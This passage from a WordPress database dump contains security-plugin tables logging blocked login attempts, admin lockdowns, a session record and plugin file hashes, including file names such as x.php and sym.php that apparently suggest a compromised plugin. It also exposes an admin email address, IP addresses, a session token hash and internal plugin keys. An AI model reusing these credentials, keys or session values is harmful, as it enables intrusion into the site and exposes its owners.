Safari\\/537.36\"}','82eyACu0oK3HJZ5bdnszf7T9',0,1638541621.6070,757,'','POST',403,0,600,0,1,'',0),('88.150.159.29',1486266141,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','QNnCvxdFfcYIHZogKUbGWh6r',0,1638589742.0658,969,'','POST',403,0,600,0,1,'',0),('81.88.52.106',1364735082,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','zv5nHBRswV9UdEWkKr1j8iqJ',0,1638608603.6741,638,'','POST',403,0,600,0,1,'',0);
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_events`
--

DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `event_type` varchar(150) NOT NULL DEFAULT '',
  `username` varchar(150) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `ip_or_host` varchar(100) DEFAULT NULL,
  `referer_info` varchar(255) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `country_code` varchar(50) DEFAULT NULL,
  `event_data` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_events`
--

LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_failed_logins`
--

DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_failed_logins`
--

LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
INSERT INTO `wp_aiowps_failed_logins` VALUES (1,0,'ashbooks','2021-06-25 01:07:57','95.76.18.50'),(2,0,'ashbooks','2021-06-25 01:09:00','95.76.18.50'),(3,0,'ashbooks','2021-06-25 01:10:05','95.76.18.50'),(4,0,'ashbooks','2021-06-25 02:10:18','95.76.18.50'),(5,0,'ashbooks','2021-06-25 02:11:19','95.76.18.50'),(6,0,'ashbooks','2021-06-25 02:12:20','95.76.18.50'),(7,1,'admin','2021-06-25 03:12:50','95.76.18.50'),(8,1,'admin','2021-06-25 03:13:19','95.76.18.50'),(9,1,'admin','2021-06-25 03:14:20','95.76.18.50'),(10,1,'admin','2021-06-25 04:15:21','95.76.18.50'),(11,1,'admin','2021-06-25 04:16:24','95.76.18.50'),(12,1,'admin','2021-06-25 04:17:22','95.76.18.50');
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_global_meta`
--

DROP TABLE IF EXISTS `wp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `meta_key1` varchar(255) NOT NULL,
  `meta_key2` varchar(255) NOT NULL,
  `meta_key3` varchar(255) NOT NULL,
  `meta_key4` varchar(255) NOT NULL,
  `meta_key5` varchar(255) NOT NULL,
  `meta_value1` varchar(255) NOT NULL,
  `meta_value2` text NOT NULL,
  `meta_value3` text NOT NULL,
  `meta_value4` longtext NOT NULL,
  `meta_value5` longtext NOT NULL,
  PRIMARY KEY (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_global_meta`
--

LOCK TABLES `wp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_activity`
--

DROP TABLE IF EXISTS `wp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_ip` varchar(100) NOT NULL DEFAULT '',
  `login_country` varchar(150) NOT NULL DEFAULT '',
  `browser_type` varchar(150) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_activity`
--

LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_activity` VALUES (1,1,'admin','2021-08-23 21:52:27','1000-10-10 10:00:00','103.70.171.77','','');
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_lockdown`
--

DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `failed_login_ip` varchar(100) NOT NULL DEFAULT '',
  `lock_reason` varchar(128) NOT NULL DEFAULT '',
  `unlock_key` varchar(128) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_lockdown`
--

LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_lockdown` VALUES (1,0,'ashbooks','2021-06-25 01:10:05','2021-06-25 02:10:05','95.76.18.50','login_fail',''),(2,0,'ashbooks','2021-06-25 02:12:21','2021-06-25 03:12:21','95.76.18.50','login_fail',''),(3,1,'admin','2021-06-25 03:14:21','2021-06-25 04:14:21','95.76.18.50','login_fail',''),(4,1,'admin','2021-06-25 04:17:22','2021-06-25 05:17:22','95.76.18.50','login_fail','');
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_permanent_block`
--

DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `blocked_ip` varchar(100) NOT NULL DEFAULT '',
  `block_reason` varchar(128) NOT NULL DEFAULT '',
  `country_origin` varchar(50) NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_permanent_block`
--

LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_files`
--

DROP TABLE IF EXISTS `wp_cerber_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_files` (
  `scan_id` int(10) unsigned NOT NULL,
  `scan_type` int(10) unsigned NOT NULL DEFAULT 1,
  `scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_name` text NOT NULL,
  `file_type` int(10) unsigned NOT NULL DEFAULT 0,
  `file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `hash_match` int(10) unsigned NOT NULL DEFAULT 0,
  `file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
  `file_perms` int(11) NOT NULL DEFAULT 0,
  `file_writable` int(10) unsigned NOT NULL DEFAULT 0,
  `file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
  `file_ext` varchar(255) NOT NULL DEFAULT '',
  `extra` text NOT NULL,
  PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_files`
--

LOCK TABLES `wp_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_sets`
--

DROP TABLE IF EXISTS `wp_cerber_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_sets` (
  `the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `the_id` bigint(20) NOT NULL DEFAULT 0,
  `the_value` longtext NOT NULL,
  `expires` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_sets`
--

LOCK TABLES `wp_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp_cerber_sets` VALUES ('admin_message',0,'a:0:{}',0),('admin_notice',0,'a:0:{}',0),('boot_cerber_addons',0,'a:0:{}',0),('cerber_admin_wide',0,'',0),('cerber_user',1,'a:2:{s:10:\"last_login\";a:2:{s:2:\"ip\";s:13:\"103.70.171.77\";s:2:\"ua\";s:40:\"83e599b94f7817a451a1792c6fb4264c84f03f8f\";}s:11:\"2fa_history\";a:2:{i:0;i:1;i:1;i:1629755546;}}',0),('garbage_collector',0,'1644432466',0),('hash_pl_6c008a9454ea346b3aebab88a946419606554385',0,'a:4:{s:4:\"name\";s:7:\"Akismet\";s:3:\"ver\";s:5:\"2.5.6\";s:4:\"hash\";a:10:{s:9:\"admin.php\";s:64:\"32af0c870d53a271f20dc20896196043536627cb52ed87d980068bb2287e3eb3\";s:11:\"akismet.css\";s:64:\"41642ccf3fd5b706b95a02fa87c0e1ddece6a007c37ac0868c5514a03a322580\";s:10:\"akismet.js\";s:64:\"0ed2a5cc83c442071af1db368bc18e9eeed07b45033bbbb8ce7dba8151432510\";s:11:\"akismet.php\";s:64:\"90a64b2f18485235f9d1fd8c6886720a0686cd9225622bbc9a8b6d94d1812409\";s:12:\"contents.php\";s:64:\"62b2e86a1c68dac9a8882829d5ba744b4c0d18041409739773a0cdff92162afd\";s:9:\"index.php\";s:64:\"2453d05345c179c9ebb0def8fb45165917acc2112e7df4d3691f5ff2e17505ec\";s:7:\"sym.php\";s:64:\"478dfc65a38128c47816491332d46038037046d05e813f36c956a6dfbcc670c7\";s:11:\"updates.php\";s:64:\"e90c0cc92de40b7c24d0a8bda7745ee9e0e6d6694d0f33b582bd57f009ebce04\";s:12:\"wjsindex.php\";s:64:\"378cb1fdb8922cb8a19a73bf32d6fa5c33d239b4fedfcbdf0903bf9998e6686e\";s:5:\"x.php\";s:64:\"09f42c9a85b652594d30d309919c9b29b91152ea87775e1652053d50afc24a5c\";}s:4:\"time\";i:1629757334;}',0),('refresh_add_on_list',0,'0',0),('_background_tasks',0,'a:0:{}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"a42c4c8b581b50518dc97c4d93b67db7\";i:1;i:1624620832;i:4;s:40:\"SK//4V0X3Y87MNOEPWRJDLBC2HQIG59Z1S6TAUFK\";}',0),('_cerber_mnemosyne',0,'a:3:{i:0;s:17:\"NLFIEAGZOSVYPUBX4\";i:4;i:10;i:10;s:16:\"91TDP4FBWXKLR68U\";}',0);
/*!40000 ALTER TABLE `wp_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_uss`
--

DROP TABLE IF EXISTS `wp_cerber_uss`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_uss` (
  `user_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `started` int(10) unsigned NOT NULL,
  `expires` int(10) unsigned NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_uss`
--

LOCK TABLES `wp_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp_cerber_uss` DISABLE KEYS */;
INSERT INTO `wp_cerber_uss` VALUES (1,'103.70.171.77','',1629755546,1629928346,'c1vDYEhKsMW8zVUJdGO6nCNb','1fb242d823aa6955afb414e55c6139f03904835aef0c5cf2d883e03f1fc27233');
/*!40000 ALTER TABLE `wp_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=153329 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://ashbooks.co.uk','yes'),(2,'home','https://ashbooks.co.uk','yes'),(3,'blogname','Ash Books Business','yes'),(4,'blogdescription','Advanced Business Consultancy','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','amber.platts@vanillacircus.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','closed','yes'),(20,'default_ping_status','closed','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/%postname%','yes'),(29,'rewrite_rules','a:93:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attac